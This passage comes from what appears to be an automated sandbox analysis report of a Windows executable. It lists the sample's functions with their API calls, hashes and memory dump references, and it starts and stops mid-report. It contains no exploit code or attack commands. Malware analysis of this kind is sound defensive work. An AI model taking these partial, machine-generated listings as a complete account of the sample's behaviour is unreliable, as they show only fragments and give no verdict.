                                      • Opcode Fuzzy Hash: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                                      • Instruction Fuzzy Hash: 6EC04C717441007AD6509B24AE49F5776E9BB70702F00C4357545D15F5DB70EC50D768
                                      Function 00409B40 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CreateHeap
                                      • String ID:
                                      • API String ID: 10892065-0
                                      • Opcode ID: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                                      • Instruction ID: 1bee1f37f93e9d35684b03c2e4756e6010034fad4ed660fefd81427f3766245b
                                      • Opcode Fuzzy Hash: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                                      • Instruction Fuzzy Hash: 2AB012702C43005AF2500B105C46B8039609304B43F304024B2015A1D4CBF0108045AC

                                      Non-executed Functions

                                      Function 00408F69 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                                        • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                                        • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                                      • GetStockObject.GDI32(00000011), ref: 00408FB2
                                      • LoadIconW.USER32 ref: 00408FE9
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                                      • RegisterClassExW.USER32 ref: 00409021
                                      • IsWindowEnabled.USER32(00000000), ref: 00409048
                                      • EnableWindow.USER32(00000000), ref: 00409059
                                      • GetSystemMetrics.USER32(00000001), ref: 00409091
                                      • GetSystemMetrics.USER32(00000000), ref: 0040909E
                                      • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                                      • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                                      • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                                      • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                                      • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                                      • wcslen.MSVCRT ref: 00409189
                                      • wcslen.MSVCRT ref: 00409191
                                      • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                                      • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                                      • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                                      • SetForegroundWindow.USER32(00000000), ref: 0040921F
                                      • BringWindowToTop.USER32(00000000), ref: 00409226
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                                      • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                                      • TranslateMessage.USER32(?), ref: 00409259
                                      • DispatchMessageW.USER32(?), ref: 00409264
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                                      • wcslen.MSVCRT ref: 00409289
                                      • wcscpy.MSVCRT ref: 004092A1
                                      • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                                      • String ID: 0$BUTTON$D0A$EDIT$STATIC
                                      • API String ID: 54849019-2968808370
                                      • Opcode ID: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                      • Instruction ID: 83f6c24ff00e7acae504a8cc9f4403d446bfccf5cce4438541287e2077ea33a9
                                      • Opcode Fuzzy Hash: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                      • Instruction Fuzzy Hash: 4E91A070648304BFE7219F64DC49F9B7FA9FB48B50F00893EF644A61E1CBB988448B59
                                      Function 00401500 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
                                        • Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                        • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                        • Part of subcall function 0040A6C5: wcsncpy.MSVCRT ref: 0040A6E3
                                        • Part of subcall function 0040A6C5: wcslen.MSVCRT ref: 0040A6F5
                                        • Part of subcall function 0040A6C5: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                                      • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$fpA$fpA$fpA$fpA$fpA
                                      • API String ID: 1295435411-3159487945
                                      • Opcode ID: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
                                      • Instruction ID: b4e4a0b709d291d116e2253cfe1eb4aef96e8d0e4325569d50da54c09323f468
                                      • Opcode Fuzzy Hash: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
                                      • Instruction Fuzzy Hash: E3B134B1504300AED600BBA1DD81E7F77A9EB88308F108D3FF544B61A2CA3DDD59966D
                                      Function 00409355 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00409373
                                        • Part of subcall function 0040E3F0: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E3FA
                                      • memset.MSVCRT ref: 00409381
                                      • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                      • wcsncpy.MSVCRT ref: 004093DD
                                      • wcslen.MSVCRT ref: 004093F1
                                      • CoTaskMemFree.OLE32(?), ref: 0040947A
                                      • wcslen.MSVCRT ref: 00409481
                                      • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                                      • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                      • API String ID: 4193992262-92458654
                                      • Opcode ID: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                      • Instruction ID: 23f57ca1c929181bfbc58391faabb4ebc57556df945843c0c8e437b0019b5ca4
                                      • Opcode Fuzzy Hash: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                      • Instruction Fuzzy Hash: D3416471508704AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B6A
                                      Function 00406310 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcsncpy.MSVCRT ref: 00406405
                                        • Part of subcall function 0040E1E0: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E1EA
                                      • _wcsdup.MSVCRT ref: 0040644E
                                      • _wcsdup.MSVCRT ref: 00406469
                                      • _wcsdup.MSVCRT ref: 0040648C
                                      • wcsncpy.MSVCRT ref: 00406578
                                      • free.MSVCRT ref: 004065DC
                                      • free.MSVCRT ref: 004065EF
                                      • free.MSVCRT ref: 00406602
                                      • wcsncpy.MSVCRT ref: 0040662E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: _wcsdupfreewcsncpy$Value
                                      • String ID: $0A$$0A$$0A
                                      • API String ID: 1554701960-360074770
                                      • Opcode ID: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                      • Instruction ID: a3954b37eea6ac6c251c7ba509b6f2d99b081bbe67bc4aeebc7e0be9c04ba548
                                      • Opcode Fuzzy Hash: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                      • Instruction Fuzzy Hash: 30A1BD715043019BCB209F18C881A2BB7F1EF94348F49093EF88667391E77AD965CB9A
                                      Function 00412082 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • TlsAlloc.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00412092
                                      • InitializeCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 0041209E
                                      • TlsGetValue.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 004120B4
                                      • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120CE
                                      • EnterCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 004120DF
                                      • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120FB
                                      • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00412114
                                      • GetCurrentThread.KERNEL32 ref: 00412117
                                      • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 0041211E
                                      • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412121
                                      • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041217A,00000000,000000FF,00000008), ref: 00412137
                                      • TlsSetValue.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412144
                                      • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412155
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                      • String ID:
                                      • API String ID: 298514914-0
                                      • Opcode ID: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                      • Instruction ID: d80fd07e77255670f12a4e616af7295cf706cbaed93ad9a0fedfb01b657d880b
                                      • Opcode Fuzzy Hash: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                      • Instruction Fuzzy Hash: 35211971644305FFDB119F64ED88B963FBAFB49311F04C43AFA09962A1CBB49850DB68
                                      Function 0040DA43 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D855,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010), ref: 0040DA51
                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA66
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA81
                                      • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA90
                                      • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DAA2
                                      • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DAB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                      • String ID: InitOnceExecuteOnce$Kernel32.dll
                                      • API String ID: 2918862794-1339284965
                                      • Opcode ID: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                      • Instruction ID: e7d3430369b103de8e34323ddaa6381870798cc52ac97d2691a1b23ef8b22f52
                                      • Opcode Fuzzy Hash: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                      • Instruction Fuzzy Hash: A701B132748204BAD7116FE49C49FEB3B29EF42762F10813AF905A11C0DB7C49458A6D
                                      Function 00409507 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                                      • GetCurrentThreadId.KERNEL32 ref: 0040951F
                                      • IsWindowVisible.USER32(?), ref: 00409526
                                        • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                      • GetCurrentThreadId.KERNEL32 ref: 00409543
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                                      • GetForegroundWindow.USER32 ref: 0040955E
                                      • IsWindowEnabled.USER32(?), ref: 00409569
                                      • EnableWindow.USER32(?,00000000), ref: 00409579
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                      • String ID:
                                      • API String ID: 3383493704-0
                                      • Opcode ID: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                      • Instruction ID: 9be2ebae674c1fa36b8fc713cd4e728ef3198b0ad07c7790c0b3041e5f2a4f9d
                                      • Opcode Fuzzy Hash: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                      • Instruction Fuzzy Hash: A901B9315083016FD3215B769C88AABBAB8AF55750B04C03EF456D3191D7749C40C66D
                                      Function 00408EB4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?), ref: 00408EED
                                      • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                                      • GetWindowTextLengthW.USER32 ref: 00408F0A
                                      • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                                      • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                                      • DestroyWindow.USER32(?), ref: 00408F3D
                                      • UnregisterClassW.USER32 ref: 00408F53
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                                      • String ID:
                                      • API String ID: 2895088630-0
                                      • Opcode ID: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                      • Instruction ID: dcdd979020c5d84d31bdac08dec077088d7257a56d77306a58cab45369b049af
                                      • Opcode Fuzzy Hash: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                      • Instruction Fuzzy Hash: C611183110810ABFCB116F64ED4C9E63F76EB08361B00C53AF44592AB0CF359955EB58
                                      Function 00409588 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EnumWindows.USER32(00409507,?), ref: 0040959B
                                      • GetCurrentThreadId.KERNEL32 ref: 004095B3
                                      • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                                      • GetCurrentThreadId.KERNEL32 ref: 004095EF
                                      • EnableWindow.USER32(?,00000001), ref: 00409605
                                      • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Window$CurrentThread$EnableEnumWindows
                                      • String ID:
                                      • API String ID: 2527101397-0
                                      • Opcode ID: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                      • Instruction ID: f5a6386b144a933a28a8080deaf79be6790ca9cb7a06763c23f847dded1acd22
                                      • Opcode Fuzzy Hash: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                      • Instruction Fuzzy Hash: 3E11AF32548741BBD7324B16EC48F577BB9EB81B20F14CA3EF052226E1DB766D44CA18
                                      Function 0040D353 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D378
                                      • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D38C
                                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D399
                                      • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3B0
                                      • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3BF
                                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3CE
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocValue$Heap
                                      • String ID:
                                      • API String ID: 2472784365-0
                                      • Opcode ID: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                      • Instruction ID: 1e11015e4a25d7f5304c1c18fd55a95fd758b035f13ce6db6bcec7fc4f8c26ab
                                      • Opcode Fuzzy Hash: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                      • Instruction Fuzzy Hash: 22116372A45310AFD7109FA5EC84A967BA9FB58760B05803EF904D33B2DB359C048AAC
                                      Function 00412004 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • UnregisterWait.KERNEL32(?), ref: 0041200E
                                      • CloseHandle.KERNEL32(?,?,?,?,0041218A,?), ref: 00412017
                                      • EnterCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412023
                                      • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412048
                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041218A,?), ref: 00412066
                                      • HeapFree.KERNEL32(?,?,?,?,?,0041218A,?), ref: 00412078
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                      • String ID:
                                      • API String ID: 4204870694-0
                                      • Opcode ID: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                      • Instruction ID: 90751bbfb1e58074f86cd24fa3ef9024ec02ad1f71581e15228f0d3cd8da5416
                                      • Opcode Fuzzy Hash: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                      • Instruction Fuzzy Hash: F5012970201601EFC7249F11EE88A96BF75FF493557108539E61AC2A70C731A821DBA8
                                      Function 004057F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON
                                      Download Yara Rule
                                      APIs
